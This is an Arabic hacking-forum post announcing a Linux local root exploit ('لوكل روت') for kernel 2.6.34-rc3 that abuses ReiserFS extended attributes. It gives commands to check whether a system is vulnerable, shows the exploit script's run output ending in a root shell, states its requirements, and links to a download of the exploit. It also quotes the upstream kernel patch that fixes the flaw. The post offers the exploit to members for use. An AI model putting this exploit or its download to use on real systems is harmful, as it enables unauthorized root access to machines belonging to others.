:: vBspiders Professional Network :: - لوكل روت 2.6.34-rc3 ReiserFS xattr

الســلام عليكم شباب,,

توه نازل لوكل جديد 2o1o

اللوكل يشتغل على نظم يوبنتو - باك تراك - اي نظام يدعم تقسيم الدرايفات بواسطة برنامج reiserfs يعتبر مصاب.

ببساطة لمعرفة هل النظام مصاب ام لا تطبيق الامر

كود:

mkreiserfs

او

كود:

locate mkreiserfs

كود:

$ python sec-r1z.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm)

متطلبات اللوكل

اقتباس Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10

* للترقيع

اقتباس
Commit 677c9b2e393a0cd203bd54e9c18b012b2c73305a accidentally introduced a
security issue into reiserfs. By allowing the privroot lookup to succeed,
users are allowed to mess about in the .reiserfs_priv directory, possibly
removing other users xattrs.

Fix this by reverting the hunk from that commit which allows the lookup to
succeed, and then checking reiserfs_expose_privroot from commit
73422811d290c628b4ddbf6830e5cd6fa42e84f1 incase this is desired behaviour for
testing.

Double checked that lookups in .reiser_priv fail as expected, while setfattr
correctly mangles xattrs for us (and fails where it should as well.)

Signed-off-by: Kyle McMartin <kyle@redhat.com>
---
fs/reiserfs/****i.c | 14 ++++++++++++++
include/linux/reiserfs_fs_sb.h | 1 +
2 files changed, 15 insertions(+), 0 deletions(-)

diff --git a/fs/reiserfs/****i.c b/fs/reiserfs/****i.c
index 9d4dcf0..9493913 100644
--- a/fs/reiserfs/****i.c
+++ b/fs/reiserfs/****i.c
@@ -345,6 +345,20 @@ static struct dentry *reiserfs_lookup(struct inode *dir, struct dentry *dentry,
&path_to_entry, &de);
pathrelse(&path_to_entry);
if (retval == ****_FOUND) {
+ /* Hide the .reiserfs_priv directory */
+ if (!reiserfs_expose_privroot(dir->i_sb) &&
+ (reiserfs_xattrs(dir->i_sb) &&
+ !old_format_only(dir->i_sb) &&
+ REISERFS_SB(dir->i_sb)->priv_root &&
+ REISERFS_SB(dir->i_sb)->priv_root->d_inode &&
+ de.de_objectid ==
+ le32_to_cpu(INODE_PKEY
+ (REISERFS_SB(dir->i_sb)->priv_root->d_inode)->
+ k_objectid))) {
+ reiserfs_write_unlock(dir->i_sb);
+ return ERR_PTR(-EACCES);
+ }
+
inode = reiserfs_iget(dir->i_sb,
(struct cpu_key *)&(de.de_dir_id));
if (!inode || IS_ERR(inode)) {
diff --git a/include/linux/reiserfs_fs_sb.h b/include/linux/reiserfs_fs_sb.h
index 52c83b6..91578eb 100644
--- a/include/linux/reiserfs_fs_sb.h
+++ b/include/linux/reiserfs_fs_sb.h
@@ -509,6 +509,7 @@ enum reiserfs_mount_options {
#define reiserfs_data_log(s) (REISERFS_SB(s)->s_mount_opt & (1 << REISERFS_DATA_LOG))
#define reiserfs_data_ordered(s) (REISERFS_SB(s)->s_mount_opt & (1 << REISERFS_DATA_ORDERED))
#define reiserfs_data_writeback(s) (REISERFS_SB(s)->s_mount_opt & (1 << REISERFS_DATA_WRITEBACK))
+#define reiserfs_xattrs(s) ((s)->s_xattr != NULL)
#define reiserfs_xattrs_user(s) (REISERFS_SB(s)->s_mount_opt & (1 << REISERFS_XATTRS_USER))
#define reiserfs_posixacl(s) (REISERFS_SB(s)->s_mount_opt & (1 << REISERFS_POSIXACL))
#define reiserfs_expose_privroot(s) (REISERFS_SB(s)->s_mount_opt & (1 << REISERFS_EXPOSE_PRIVROOT))
--
1.6.6

للتحميل اللوكل

http://www.tktekat.com/up//view.php?file=b012714fd3

تحياتي لكم smilies18